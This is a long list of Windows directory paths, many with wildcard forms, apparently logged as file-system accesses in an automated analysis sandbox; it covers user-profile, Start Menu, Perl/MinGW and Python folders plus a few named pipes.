c:\Documents and Settings\All Users\Start Menu\Programs\PHP 5\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\PHP 5<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Python 2.7\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Python 2.7<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Startup\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Startup<br />
c:\Documents and Settings\User\*<br />
c:\Documents and Settings\User<br />
c:\Documents and Settings\User\Cookies\*<br />
c:\Documents and Settings\User\Cookies<br />
c:\Documents and Settings\User\Desktop\*<br />
c:\Documents and Settings\User\Desktop<br />
c:\Documents and Settings\User\Favorites\*<br />
c:\Documents and Settings\User\Favorites<br />
c:\Documents and Settings\User\Favorites\Links\*<br />
c:\Documents and Settings\User\Favorites\Links<br />
c:\Documents and Settings\User\My Documents\*<br />
c:\Documents and Settings\User\My Documents<br />
c:\Documents and Settings\User\My Documents\Downloads\*<br />
c:\Documents and Settings\User\My Documents\Downloads<br />
c:\Documents and Settings\User\My Documents\My Music\*<br />
c:\Documents and Settings\User\My Documents\My Music<br />
c:\Documents and Settings\User\My Documents\My Pictures\*<br />
c:\Documents and Settings\User\My Documents\My Pictures<br />
c:\Documents and Settings\User\Start Menu\*<br />
c:\Documents and Settings\User\Start Menu<br />
c:\Documents and Settings\User\Start Menu\Programs\*<br />
c:\Documents and Settings\User\Start Menu\Programs<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Accessibility\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Accessibility<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Entertainment\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Accessories\Entertainment<br />
c:\Documents and Settings\User\Start Menu\Programs\Startup\*<br />
c:\Documents and Settings\User\Start Menu\Programs\Startup<br />
c:\EpbkAfIwEo\*<br />
c:\EpbkAfIwEo<br />
c:\EpbkAfIwEo\drop\*<br />
c:\EpbkAfIwEo\drop<br />
c:\EpbkAfIwEo\files\*<br />
c:\EpbkAfIwEo\files<br />
c:\EpbkAfIwEo\logs\*<br />
c:\EpbkAfIwEo\logs<br />
c:\EpbkAfIwEo\memory\*<br />
c:\EpbkAfIwEo\memory<br />
c:\EpbkAfIwEo\shots\*<br />
c:\EpbkAfIwEo\shots<br />
c:\Lib\*<br />
c:\Lib<br />
c:\Lib\site-packages\*<br />
c:\Lib\site-packages<br />
c:\Lib\site-packages\distorm\*<br />
c:\Lib\site-packages\distorm<br />
c:\Perl\*<br />
c:\Perl<br />
c:\Perl\c\*<br />
c:\Perl\c<br />
c:\Perl\c\bin\*<br />
c:\Perl\c\bin<br />
c:\Perl\c\bin\startup\*<br />
c:\Perl\c\bin\startup<br />
c:\Perl\c\i686-w64-mingw32\*<br />
c:\Perl\c\i686-w64-mingw32<br />
c:\Perl\c\i686-w64-mingw32\bin\*<br />
c:\Perl\c\i686-w64-mingw32\bin<br />
C:\Device\RdpDr<br />
PIPE\wkssvc<br />
c:\Perl\c\i686-w64-mingw32\include\*<br />
c:\Perl\c\i686-w64-mingw32\include<br />
C:\Device\LanmanDatagramReceiver<br />
PIPE\browser<br />
shadow<br />
c:\Perl\c\i686-w64-mingw32\include\GL\*<br />
c:\Perl\c\i686-w64-mingw32\include\GL<br />
PIPE\srvsvc<br />
PIPE\DAV RPC SERVICE<br />
c:\Perl\c\i686-w64-mingw32\include\sdks\*<br />
c:\Perl\c\i686-w64-mingw32\include\sdks<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\*<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys\*<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys<br />
c:\Perl\c\i686-w64-mingw32\include\sys\*<br />
c:\Perl\c\i686-w64-mingw32\include\sys<br />
c:\Perl\c\i686-w64-mingw32\lib\*<br />
c:\Perl\c\i686-w64-mingw32\lib<br />
c:\Perl\c\i686-w64-mingw32\lib\ldscripts\*<br />
c:\Perl\c\i686-w64-mingw32\lib\ldscripts<br />
c:\Perl\c\include\*<br />
c:\Perl\c\include<br />
c:\Perl\c\include\c++\*<br />
c:\Perl\c\include\c++<br />
c:\Perl\c\include\c++\4.4.3\*<br />
c:\Perl\c\include\c++\4.4.3<br />
c:\Perl\c\include\c++\4.4.3\backward\*<br />
c:\Perl\c\include\c++\4.4.3\backward<br />
c:\Perl\c\include\c++\4.4.3\bits\*<br />
c:\Perl\c\include\c++\4.4.3\bits<br />
c:\Perl\c\include\c++\4.4.3\debug\*<br />
c:\Perl\c\include\c++\4.4.3\debug<br />
c:\Perl\c\include\c++\4.4.3\ext\*<br />
c:\Perl\c\include\c++\4.4.3\ext<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\basic_tree_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\basic_tree_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binary_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binary_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_base_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\binomial_heap_base_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\bin_search_tree_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\bin_search_tree_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\cc_hash_table_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\cc_hash_table_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\eq_fn\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\eq_fn<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\gp_hash_table_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\gp_hash_table_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\hash_fn\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\hash_fn<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\left_child_next_sibling_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\left_child_next_sibling_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\list_update_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\ov_tree_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\ov_tree_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pairing_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pairing_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pat_trie_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\pat_trie_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rb_tree_map_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rb_tree_map_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rc_binomial_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\rc_binomial_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\resize_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\resize_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\splay_tree_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\splay_tree_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\thin_heap_\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\thin_heap_<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\tree_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\tree_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\trie_policy\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\trie_policy<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\unordered_iterator\*<br />
c:\Perl\c\include\c++\4.4.3\ext\pb_ds\detail\unordered_iterator<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\*<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\*<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits<br />
c:\Perl\c\include\c++\4.4.3\tr1\*<br />
c:\Perl\c\include\c++\4.4.3\tr1<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\*<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl<br />
c:\Perl\c\include\freetype2\*<br />
c:\Perl\c\include\freetype2<br />
c:\Perl\c\include\freetype2\freetype\*<br />
c:\Perl\c\include\freetype2\freetype<br />
c:\Perl\c\include\freetype2\freetype\config\*<br />
c:\Perl\c\include\freetype2\freetype\config<br />
c:\Perl\c\include\GL\*<br />
c:\Perl\c\include\GL<br />
c:\Perl\c\include\libexslt\*<br />
c:\Perl\c\include\libexslt<br />
c:\Perl\c\include\libpng12\*<br />
c:\Perl\c\include\libpng12<br />
c:\Perl\c\include\libxml\*<br />
c:\Perl\c\include\libxml<br />
c:\Perl\c\include\libxslt\*<br />
c:\Perl\c\include\libxslt<br />
c:\Perl\c\include\lzma\*<br />
c:\Perl\c\include\lzma<br />
c:\Perl\c\include\mysql_5\*<br />
c:\Perl\c\include\mysql_5<br />
c:\Perl\c\include\mysql_5\mysql\*<br />
c:\Perl\c\include\mysql_5\mysql<br />
c:\Perl\c\include\openssl\*<br />
c:\Perl\c\include\openssl<br />
c:\Perl\c\include\X11\*<br />
c:\Perl\c\include\X11<br />
c:\Perl\c\lib\*<br />
c:\Perl\c\lib<br />
c:\Perl\c\lib\gcc\*<br />
c:\Perl\c\lib\gcc<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include\*<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include<br />
c:\Perl\c\lib\pkgconfig\*<br />
c:\Perl\c\lib\pkgconfig<br />
c:\Perl\c\lib32\*<br />
c:\Perl\c\lib32<br />
c:\Perl\c\libexec\*<br />
c:\Perl\c\libexec<br />
c:\Perl\c\libexec\gcc\*<br />
c:\Perl\c\libexec\gcc<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\*<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\*<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools\*<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools<br />
c:\Perl\cpan\*<br />
c:\Perl\cpan<br />
c:\Perl\cpan\sources\*<br />
c:\Perl\cpan\sources<br />
c:\Perl\cpanplus\*<br />
c:\Perl\cpanplus<br />
c:\Perl\licenses\*<br />
c:\Perl\licenses<br />
c:\Perl\licenses\binutils\*<br />
c:\Perl\licenses\binutils<br />
c:\Perl\licenses\dmake\*<br />
c:\Perl\licenses\dmake<br />
c:\Perl\licenses\gcc\*<br />
c:\Perl\licenses\gcc<br />
c:\Perl\licenses\gmake\*<br />
c:\Perl\licenses\gmake<br />
c:\Perl\licenses\libdb-BerkeleyDB\*<br />
c:\Perl\licenses\libdb-BerkeleyDB<br />
c:\Perl\licenses\libexpat\*<br />
c:\Perl\licenses\libexpat<br />
c:\Perl\licenses\libfreeglut\*<br />
c:\Perl\licenses\libfreeglut<br />
c:\Perl\licenses\libfreetype\*<br />
c:\Perl\licenses\libfreetype<br />
c:\Perl\licenses\libgd\*<br />
c:\Perl\licenses\libgd<br />
c:\Perl\licenses\libgdbm\*<br />
c:\Perl\licenses\libgdbm<br />
c:\Perl\licenses\libgif\*<br />
c:\Perl\licenses\libgif<br />
c:\Perl\licenses\libgmp\*<br />
c:\Perl\licenses\libgmp<br />
c:\Perl\licenses\libiconv\*<br />
c:\Perl\licenses\libiconv<br />
c:\Perl\licenses\libjpeg\*<br />
c:\Perl\licenses\libjpeg<br />
c:\Perl\licenses\liblzma\*<br />
c:\Perl\licenses\liblzma<br />
c:\Perl\licenses\libmpc\*<br />
c:\Perl\licenses\libmpc<br />
c:\Perl\licenses\libmpfr\*<br />
c:\Perl\licenses\libmpfr<br />
c:\Perl\licenses\libpng\*<br />
c:\Perl\licenses\libpng<br />
c:\Perl\licenses\libssh2\*<br />
c:\Perl\licenses\libssh2<br />
c:\Perl\licenses\libtiff\*<br />
c:\Perl\licenses\libtiff<br />
c:\Perl\licenses\libxml2\*<br />
c:\Perl\licenses\libxml2<br />
c:\Perl\licenses\libxpm\*<br />
c:\Perl\licenses\libxpm<br />
c:\Perl\licenses\libxslt\*<br />
c:\Perl\licenses\libxslt<br />
c:\Perl\licenses\libzlib\*<br />
c:\Perl\licenses\libzlib<br />
c:\Perl\licenses\mingw-w64-crt\*<br />
c:\Perl\licenses\mingw-w64-crt<br />
c:\Perl\licenses\mysql\*<br />
c:\Perl\licenses\mysql<br />
c:\Perl\licenses\openssl\*<br />
c:\Perl\licenses\openssl<br />
c:\Perl\licenses\patch\*<br />
c:\Perl\licenses\patch<br />
c:\Perl\licenses\perl\*<br />
c:\Perl\licenses\perl<br />
c:\Perl\licenses\pexports\*<br />
c:\Perl\licenses\pexports<br />
c:\Perl\licenses\postgresql\*<br />
c:\Perl\licenses\postgresql<br />
c:\Perl\perl\*<br />
c:\Perl\perl<br />
c:\Perl\perl\bin\*<br />
c:\Perl\perl\bin<br />
c:\Perl\perl\lib\*<br />
c:\Perl\perl\lib<br />
c:\Perl\perl\lib\App\*<br />
c:\Perl\perl\lib\App<br />
c:\Perl\perl\lib\App\Prove\*<br />
c:\Perl\perl\lib\App\Prove<br />
c:\Perl\perl\lib\App\Prove\State\*<br />
c:\Perl\perl\lib\App\Prove\State<br />
c:\Perl\perl\lib\App\Prove\State\Result\*<br />
c:\Perl\perl\lib\App\Prove\State\Result<br />
c:\Perl\perl\lib\Archive\*<br />
c:\Perl\perl\lib\Archive<br />
c:\Perl\perl\lib\Archive\Tar\*<br />
c:\Perl\perl\lib\Archive\Tar<br />
c:\Perl\perl\lib\Attribute\*<br />
c:\Perl\perl\lib\Attribute<br />
c:\Perl\perl\lib\auto\*<br />
c:\Perl\perl\lib\auto<br />
c:\Perl\perl\lib\auto\Archive\*<br />
c:\Perl\perl\lib\auto\Archive<br />
c:\Perl\perl\lib\auto\Archive\Extract\*<br />
c:\Perl\perl\lib\auto\Archive\Extract<br />
c:\Perl\perl\lib\auto\Archive\Tar\*<br />
c:\Perl\perl\lib\auto\Archive\Tar<br />
c:\Perl\perl\lib\auto\Attribute\*<br />
c:\Perl\perl\lib\auto\Attribute<br />
c:\Perl\perl\lib\auto\Attribute\Handlers\*<br />
c:\Perl\perl\lib\auto\Attribute\Handlers<br />
c:\Perl\perl\lib\auto\attributes\*<br />
c:\Perl\perl\lib\auto\attributes<br />
c:\Perl\perl\lib\auto\autodie\*<br />
c:\Perl\perl\lib\auto\autodie<br />
c:\Perl\perl\lib\auto\AutoLoader\*<br />
c:\Perl\perl\lib\auto\AutoLoader<br />
c:\Perl\perl\lib\auto\B\*<br />
c:\Perl\perl\lib\auto\B<br />
c:\Perl\perl\lib\auto\B\Debug\*<br />
c:\Perl\perl\lib\auto\B\Debug<br />
c:\Perl\perl\lib\auto\B\Lint\*<br />
c:\Perl\perl\lib\auto\B\Lint<br />
c:\Perl\perl\lib\auto\bignum\*<br />
c:\Perl\perl\lib\auto\bignum<br />
c:\Perl\perl\lib\auto\CGI\*<br />
c:\Perl\perl\lib\auto\CGI<br />
c:\Perl\perl\lib\auto\Compress\*<br />
c:\Perl\perl\lib\auto\Compress<br />
c:\Perl\perl\lib\auto\Compress\Raw\*<br />
c:\Perl\perl\lib\auto\Compress\Raw<br />
c:\Perl\perl\lib\auto\Compress\Raw\Bzip2\*<br />
c:\Perl\perl\lib\auto\Compress\Raw\Bzip2<br />
c:\Perl\perl\lib\auto\Compress\Raw\Zlib\*<br />
c:\Perl\perl\lib\auto\Compress\Raw\Zlib<br />
c:\Perl\perl\lib\auto\Compress\Zlib\*<br />
c:\Perl\perl\lib\auto\Compress\Zlib<br />
c:\Perl\perl\lib\auto\constant\*<br />
c:\Perl\perl\lib\auto\constant<br />
c:\Perl\perl\lib\auto\CPAN\*<br />
c:\Perl\perl\lib\auto\CPAN<br />
c:\Perl\perl\lib\auto\CPANPLUS\*<br />
c:\Perl\perl\lib\auto\CPANPLUS<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist\*<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist\Build\*<br />
c:\Perl\perl\lib\auto\CPANPLUS\Dist\Build<br />
c:\Perl\perl\lib\auto\Cwd\*<br />
c:\Perl\perl\lib\auto\Cwd<br />
c:\Perl\perl\lib\auto\Data\*<br />
c:\Perl\perl\lib\auto\Data<br />
c:\Perl\perl\lib\auto\Data\Dumper\*<br />
c:\Perl\perl\lib\auto\Data\Dumper<br />
c:\Perl\perl\lib\auto\Devel\*<br />
c:\Perl\perl\lib\auto\Devel<br />
c:\Perl\perl\lib\auto\Devel\DProf\*<br />
c:\Perl\perl\lib\auto\Devel\DProf<br />
c:\Perl\perl\lib\auto\Devel\Peek\*<br />
c:\Perl\perl\lib\auto\Devel\Peek<br />
c:\Perl\perl\lib\auto\Devel\PPPort\*<br />
c:\Perl\perl\lib\auto\Devel\PPPort<br />
c:\Perl\perl\lib\auto\Devel\SelfStubber\*<br />
c:\Perl\perl\lib\auto\Devel\SelfStubber<br />
c:\Perl\perl\lib\auto\Digest\*<br />
c:\Perl\perl\lib\auto\Digest<br />
c:\Perl\perl\lib\auto\Digest\MD5\*<br />
c:\Perl\perl\lib\auto\Digest\MD5<br />
c:\Perl\perl\lib\auto\Digest\SHA\*<br />
c:\Perl\perl\lib\auto\Digest\SHA<br />
c:\Perl\perl\lib\auto\Dumpvalue\*<br />
c:\Perl\perl\lib\auto\Dumpvalue<br />
c:\Perl\perl\lib\auto\DynaLoader\*<br />
c:\Perl\perl\lib\auto\DynaLoader<br />
c:\Perl\perl\lib\auto\Encode\*<br />
c:\Perl\perl\lib\auto\Encode<br />
c:\Perl\perl\lib\auto\Encode\Byte\*<br />
c:\Perl\perl\lib\auto\Encode\Byte<br />
c:\Perl\perl\lib\auto\Encode\CN\*<br />
c:\Perl\perl\lib\auto\Encode\CN<br />
c:\Perl\perl\lib\auto\Encode\EBCDIC\*<br />
c:\Perl\perl\lib\auto\Encode\EBCDIC<br />
c:\Perl\perl\lib\auto\Encode\JP\*<br />
c:\Perl\perl\lib\auto\Encode\JP<br />
c:\Perl\perl\lib\auto\Encode\KR\*<br />
c:\Perl\perl\lib\auto\Encode\KR<br />
c:\Perl\perl\lib\auto\Encode\Symbol\*<br />
c:\Perl\perl\lib\auto\Encode\Symbol<br />
c:\Perl\perl\lib\auto\Encode\TW\*<br />
c:\Perl\perl\lib\auto\Encode\TW<br />
c:\Perl\perl\lib\auto\Encode\Unicode\*<br />
c:\Perl\perl\lib\auto\Encode\Unicode<br />
c:\Perl\perl\lib\auto\Env\*<br />
c:\Perl\perl\lib\auto\Env<br />
c:\Perl\perl\lib\auto\ExtUtils\*<br />
c:\Perl\perl\lib\auto\ExtUtils<br />
c:\Perl\perl\lib\auto\ExtUtils\CBuilder\*<br />
c:\Perl\perl\lib\auto\ExtUtils\CBuilder<br />
c:\Perl\perl\lib\auto\ExtUtils\Command\*<br />
c:\Perl\perl\lib\auto\ExtUtils\Command<br />
c:\Perl\perl\lib\auto\ExtUtils\Constant\*<br />
c:\Perl\perl\lib\auto\ExtUtils\Constant<br />
c:\Perl\perl\lib\auto\ExtUtils\Manifest\*<br />
c:\Perl\perl\lib\auto\ExtUtils\Manifest<br />
c:\Perl\perl\lib\auto\ExtUtils\ParseXS\*<br />
c:\Perl\perl\lib\auto\ExtUtils\ParseXS<br />
c:\Perl\perl\lib\auto\Fcntl\*<br />
c:\Perl\perl\lib\auto\Fcntl<br />
c:\Perl\perl\lib\auto\File\*<br />
c:\Perl\perl\lib\auto\File<br />
c:\Perl\perl\lib\auto\File\Fetch\*<br />
c:\Perl\perl\lib\auto\File\Fetch<br />
c:\Perl\perl\lib\auto\File\Glob\*<br />
c:\Perl\perl\lib\auto\File\Glob<br />
c:\Perl\perl\lib\auto\Filter\*<br />
c:\Perl\perl\lib\auto\Filter<br />
c:\Perl\perl\lib\auto\Filter\decrypt\*<br />
c:\Perl\perl\lib\auto\Filter\decrypt<br />
c:\Perl\perl\lib\auto\Filter\Simple\*<br />
c:\Perl\perl\lib\auto\Filter\Simple<br />
c:\Perl\perl\lib\auto\Filter\tee\*<br />
c:\Perl\perl\lib\auto\Filter\tee<br />
c:\Perl\perl\lib\auto\Filter\Util\*<br />
c:\Perl\perl\lib\auto\Filter\Util<br />
c:\Perl\perl\lib\auto\Filter\Util\Call\*<br />
c:\Perl\perl\lib\auto\Filter\Util\Call<br />
c:\Perl\perl\lib\auto\Filter\Util\Exec\*<br />
c:\Perl\perl\lib\auto\Filter\Util\Exec<br />
c:\Perl\perl\lib\auto\GDBM_File\*<br />
c:\Perl\perl\lib\auto\GDBM_File<br />
c:\Perl\perl\lib\auto\Hash\*<br />
c:\Perl\perl\lib\auto\Hash<br />
c:\Perl\perl\lib\auto\Hash\Util\*<br />
c:\Perl\perl\lib\auto\Hash\Util<br />
c:\Perl\perl\lib\auto\Hash\Util\FieldHash\*<br />
c:\Perl\perl\lib\auto\Hash\Util\FieldHash<br />
c:\Perl\perl\lib\auto\if\*<br />
c:\Perl\perl\lib\auto\if<br />
c:\Perl\perl\lib\auto\IO\*<br />
c:\Perl\perl\lib\auto\IO<br />
c:\Perl\perl\lib\auto\IO\Compress\*<br />
c:\Perl\perl\lib\auto\IO\Compress<br />
c:\Perl\perl\lib\auto\IPC\*<br />
c:\Perl\perl\lib\auto\IPC<br />
c:\Perl\perl\lib\auto\IPC\Cmd\*<br />
c:\Perl\perl\lib\auto\IPC\Cmd<br />
c:\Perl\perl\lib\auto\List\*<br />
c:\Perl\perl\lib\auto\List<br />
c:\Perl\perl\lib\auto\List\Util\*<br />
c:\Perl\perl\lib\auto\List\Util<br />
c:\Perl\perl\lib\auto\Locale\*<br />
c:\Perl\perl\lib\auto\Locale<br />
c:\Perl\perl\lib\auto\Locale\Codes\*<br />
c:\Perl\perl\lib\auto\Locale\Codes<br />
c:\Perl\perl\lib\auto\Locale-Maketext\*<br />
c:\Perl\perl\lib\auto\Locale-Maketext<br />
c:\Perl\perl\lib\auto\Log\*<br />
c:\Perl\perl\lib\auto\Log<br />
c:\Perl\perl\lib\auto\Log\Message\*<br />
c:\Perl\perl\lib\auto\Log\Message<br />
c:\Perl\perl\lib\auto\Log\Message\Simple\*<br />
c:\Perl\perl\lib\auto\Log\Message\Simple<br />
c:\Perl\perl\lib\auto\Math\*<br />
c:\Perl\perl\lib\auto\Math<br />
c:\Perl\perl\lib\auto\Math\BigInt\*<br />
c:\Perl\perl\lib\auto\Math\BigInt<br />
c:\Perl\perl\lib\auto\Math\BigInt\FastCalc\*<br />
c:\Perl\perl\lib\auto\Math\BigInt\FastCalc<br />
c:\Perl\perl\lib\auto\Math\BigRat\*<br />
c:\Perl\perl\lib\auto\Math\BigRat<br />
c:\Perl\perl\lib\auto\Math\Complex\*<br />
c:\Perl\perl\lib\auto\Math\Complex<br />
c:\Perl\perl\lib\auto\Memoize\*<br />
c:\Perl\perl\lib\auto\Memoize<br />
c:\Perl\perl\lib\auto\MIME\*<br />
c:\Perl\perl\lib\auto\MIME<br />
c:\Perl\perl\lib\auto\MIME\Base64\*<br />
c:\Perl\perl\lib\auto\MIME\Base64<br />
c:\Perl\perl\lib\auto\Module\*<br />
c:\Perl\perl\lib\auto\Module<br />
c:\Perl\perl\lib\auto\Module\Build\*<br />
c:\Perl\perl\lib\auto\Module\Build<br />
c:\Perl\perl\lib\auto\Module\CoreList\*<br />
c:\Perl\perl\lib\auto\Module\CoreList<br />
c:\Perl\perl\lib\auto\Module\Load\*<br />
c:\Perl\perl\lib\auto\Module\Load<br />
c:\Perl\perl\lib\auto\Module\Load\Conditional\*<br />
c:\Perl\perl\lib\auto\Module\Load\Conditional<br />
c:\Perl\perl\lib\auto\mro\*<br />
c:\Perl\perl\lib\auto\mro<br />
c:\Perl\perl\lib\auto\NEXT\*<br />
c:\Perl\perl\lib\auto\NEXT<br />
c:\Perl\perl\lib\auto\Object\*<br />
c:\Perl\perl\lib\auto\Object<br />
c:\Perl\perl\lib\auto\Object\Accessor\*<br />
c:\Perl\perl\lib\auto\Object\Accessor<br />
c:\Perl\perl\lib\auto\Opcode\*<br />
c:\Perl\perl\lib\auto\Opcode<br />
c:\Perl\perl\lib\auto\Params\*<br />
c:\Perl\perl\lib\auto\Params<br />
c:\Perl\perl\lib\auto\Params\Check\*<br />
c:\Perl\perl\lib\auto\Params\Check<br />
c:\Perl\perl\lib\auto\parent\*<br />
c:\Perl\perl\lib\auto\parent<br />
c:\Perl\perl\lib\auto\Parse\*<br />
c:\Perl\perl\lib\auto\Parse<br />
c:\Perl\perl\lib\auto\Parse\CPAN\*<br />
c:\Perl\perl\lib\auto\Parse\CPAN<br />
c:\Perl\perl\lib\auto\Parse\CPAN\Meta\*<br />
c:\Perl\perl\lib\auto\Parse\CPAN\Meta<br />
c:\Perl\perl\lib\auto\PerlIO\*<br />
c:\Perl\perl\lib\auto\PerlIO<br />
c:\Perl\perl\lib\auto\PerlIO\encoding\*<br />
c:\Perl\perl\lib\auto\PerlIO\encoding<br />
c:\Perl\perl\lib\auto\PerlIO\scalar\*<br />
c:\Perl\perl\lib\auto\PerlIO\scalar<br />
c:\Perl\perl\lib\auto\PerlIO\via\*<br />
c:\Perl\perl\lib\auto\PerlIO\via<br />
c:\Perl\perl\lib\auto\Pod\*<br />
c:\Perl\perl\lib\auto\Pod<br />
c:\Perl\perl\lib\auto\Pod\LaTeX\*<br />
c:\Perl\perl\lib\auto\Pod\LaTeX<br />
c:\Perl\perl\lib\auto\Pod\Plainer\*<br />
c:\Perl\perl\lib\auto\Pod\Plainer<br />
c:\Perl\perl\lib\auto\Pod\Simple\*<br />
c:\Perl\perl\lib\auto\Pod\Simple<br />
c:\Perl\perl\lib\auto\POSIX\*<br />
c:\Perl\perl\lib\auto\POSIX<br />
c:\Perl\perl\lib\auto\POSIX\SigAction\*<br />
c:\Perl\perl\lib\auto\POSIX\SigAction<br />
c:\Perl\perl\lib\auto\POSIX\SigRt\*<br />
c:\Perl\perl\lib\auto\POSIX\SigRt<br />
c:\Perl\perl\lib\auto\re\*<br />
c:\Perl\perl\lib\auto\re<br />
c:\Perl\perl\lib\auto\Safe\*<br />
c:\Perl\perl\lib\auto\Safe<br />
c:\Perl\perl\lib\auto\sdbm\*<br />
c:\Perl\perl\lib\auto\sdbm<br />
c:\Perl\perl\lib\auto\SDBM_File\*<br />
c:\Perl\perl\lib\auto\SDBM_File<br />
c:\Perl\perl\lib\auto\SelfLoader\*<br />
c:\Perl\perl\lib\auto\SelfLoader<br />
c:\Perl\perl\lib\auto\Socket\*<br />
c:\Perl\perl\lib\auto\Socket<br />
c:\Perl\perl\lib\auto\Storable\*<br />
c:\Perl\perl\lib\auto\Storable<br />
c:\Perl\perl\lib\auto\Sys\*<br />
c:\Perl\perl\lib\auto\Sys<br />
c:\Perl\perl\lib\auto\Sys\Hostname\*<br />
c:\Perl\perl\lib\auto\Sys\Hostname<br />
